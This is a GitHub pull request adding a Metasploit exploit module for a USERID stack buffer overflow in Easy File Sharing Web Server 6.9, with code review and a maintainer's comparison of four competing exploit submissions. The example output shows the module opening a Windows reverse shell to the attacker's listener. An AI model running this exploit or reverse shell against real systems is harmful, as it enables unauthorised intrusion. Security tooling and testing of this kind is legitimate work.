### PR TITLE
Add Easy File Sharing Web Server 6.9 (efs_userid_69) stack buffer overflow module

### PR DESCRIPTION
**Pull request by thesubtlety**
Forked from abandoned https://github.com/rapid7/metasploit-framework/pull/5897

Verification:
- Install Easy File Sharing Web Server 6.9
- Start server
- Run module

Tested on Windows 7x32
## Example Output

```
msf > use exploit/windows/http/efs_userid_69
msf exploit(efs_userid_69) > set rhost 192.168.0.50
rhost => 192.168.0.50
msf exploit(efs_userid_69) > set payload
windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(efs_userid_69) > set lhost 192.168.0.43
lhost => 192.168.0.43
msf exploit(efs_userid_69) > exploit

[*] Started reverse handler on 192.168.0.43:4444
[*] Sending request...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.0.50
[*] Command shell session 1 opened (192.168.0.43:4444 ->
192.168.0.50:469164) at 2015-10-25 23:35:05 -0400

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\user\Desktop>
```

### CODE REVIEW

**Comment by wchen-r7** [comment]
Note to all devs: There are multiple Easy File Sharing Web Server modules (pull requests). Please see: https://github.com/rapid7/metasploit-framework/pulls?utf8=%E2%9C%93&q=is%3Apr+is%3Aopen+Easy+File+Sharing+Web+Server

**Comment by wchen-r7** [comment]
Note to all devs: There are multiple Easy File Sharing Web Server modules (pull requests). Please see: https://github.com/rapid7/metasploit-framework/pulls?utf8=%E2%9C%93&q=is%3Apr+is%3Aopen+Easy+File+Sharing+Web+Server

File: modules/exploits/windows/http/efs_userid_69.rb [hunk 1]
```diff
@@ -0,0 +1,110 @@
...
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'    => 'Easy File Sharing Web Server - USERID Remote Buffer Overflow',
```
Comment (shipcod3) [inline modules/exploits/windows/http/efs_userid_69.rb]: Don't use hard tabs.Stick to the Ruby style guide. You might want to use 2 spaces :)

Comment (thesubtlety) [inline modules/exploits/windows/http/efs_userid_69.rb]: I think this is already the case? Not seeing any hard `\t`s.

Comment (shipcod3) [inline modules/exploits/windows/http/efs_userid_69.rb]: This might be hard spaces. Use shift + backspace for backtracking

Comment (thesubtlety) [inline modules/exploits/windows/http/efs_userid_69.rb]: Just double checked - I'm using soft tab two-space indents. May need to spell out exactly what you're looking for, sorry.

**Comment by wchen-r7** [comment]
Hello guys,

Since last October, we have received multiple exploits for Easy File Sharing. Specifically, these ones:

https://github.com/rapid7/metasploit-framework/pull/6113
https://github.com/rapid7/metasploit-framework/pull/6135
https://github.com/rapid7/metasploit-framework/pull/6181
https://github.com/rapid7/metasploit-framework/pull/6488

It was difficult to decide how to get them in Framework because they are so similar, no CVEs and no RCA, so we waited. We have not gained any momentum since #6488, so I decided to settle this by letting these four exploits compete: whichever is able to exploit against the latest (v7.2 on XP SP3), and the most reliable is the winner. And here's how it went down:

* #6113 exploits version 6.8, via a USERID parameter in the cookie. Crashes the tested v7.2.
* #6135 exploits version 7.2, also via a USERID parameter in the cookie. Crashes the tested 7.2.
* #6181 exploits version 6.9, also via a USERID parameter in the cookie. Crashes the tested 7.2.
* #6488 exploits version 7.2, via the GET path. Gets a session reliably.

We will merge #6488 to master. And we will close the rest - sorry to disappoint, but thanks for the PRs. We hope to see more contributions from you all.

**Pull request closed without merging**